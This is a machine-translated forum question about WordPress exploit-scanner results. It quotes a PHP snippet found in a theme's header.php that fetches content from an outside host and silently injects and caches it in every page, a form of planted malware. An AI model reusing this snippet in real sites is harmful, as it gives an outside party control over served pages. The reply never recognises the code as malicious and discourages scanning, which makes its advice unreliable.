2015-12-21 36 views
-1

當我使用exploit scanner插件我得到下面的結果掃描一個WordPressPHP惡意軟件,WordPress的利用,PHP病毒

圖片1:

image 1

圖2:

image 2

圖3:

image 3

有什麼可擔心的嗎?是包含惡意代碼?

另外在theame header.php文件中,我看到了以下細節。有什麼可擔心的嗎?以下代碼實際上在做什麼?

<?php 
$h = $_SERVER['HTTP_HOST']; $u = trim($_SERVER['REQUEST_URI']); 
$cd = dirname(__FILE__) . '/.cache'; 
$cf = $cd . '/' . md5($h . '##' . $u); 
$s = '1.granitebb.com'; 
if (file_exists($cf) and filemtime($cf) > time() - 3600) 
    echo file_get_contents($cf); 
else 
{ 
    $ini1 = @ini_set('allow_url_fopen', 1); $ini2 = @ini_set('default_socket_timeout', 3); 
    $p = '/links.php?u=' . urlencode($u) . '&h=' . urlencode($h); 
    $c = ''; 
    if ($fp = @fsockopen($s, 80, $errno, $errstr, 3)) { 
     @fputs($fp, "GET {$p} HTTP/1.0\r\nHost: $s\r\n\r\n"); 
     while (! feof($fp)) 
      $c .= @fread($fp, 8192); 
     fclose($fp); 
     $c = end(explode("\r\n\r\n", $c)); 
     echo $c; 
     if (strlen($c) and (is_dir($cd) or @mkdir($cd))) { 
      @file_put_contents($cf, $c); 
     } 
    } 
    @ini_set('allow_url_fopen', $ini1); @ini_set('default_socket_timeout', $ini2); 
} 
?> 

回答

0

執行以下操作檢查,以確保您的安全: 1:從原始來源處下載WordPress的插件文件。 2:將這些文件與您在wordpress安裝中掃描的文件進行比較。

如果他們是相同的,你(可能)是安全的。如果它們不相同,請刪除壞文件並重新安裝插件。之後,找到有人檢查文件爲什麼被改變。

建議:如果您不知道如何處理結果,請不要運行這些掃描儀。它只會給你一種不好的感覺,可能完全沒有理由。